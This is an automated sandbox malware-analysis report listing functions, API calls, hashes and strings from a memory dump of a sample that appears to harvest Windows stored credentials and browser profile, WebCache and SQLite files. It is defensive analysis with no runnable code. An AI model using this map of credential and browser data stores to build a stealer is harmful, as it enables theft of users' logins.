                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: BIN
                                                              • API String ID: 1668488027-1015027815
                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                              Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID:
                                                              • API String ID: 697348961-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 3527940856-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 3527940856-2068335096
                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 3527940856-3369679110
                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 2758756878-1896041820
                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 3249829328-1174173950
                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 2705122986-2036018995
                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
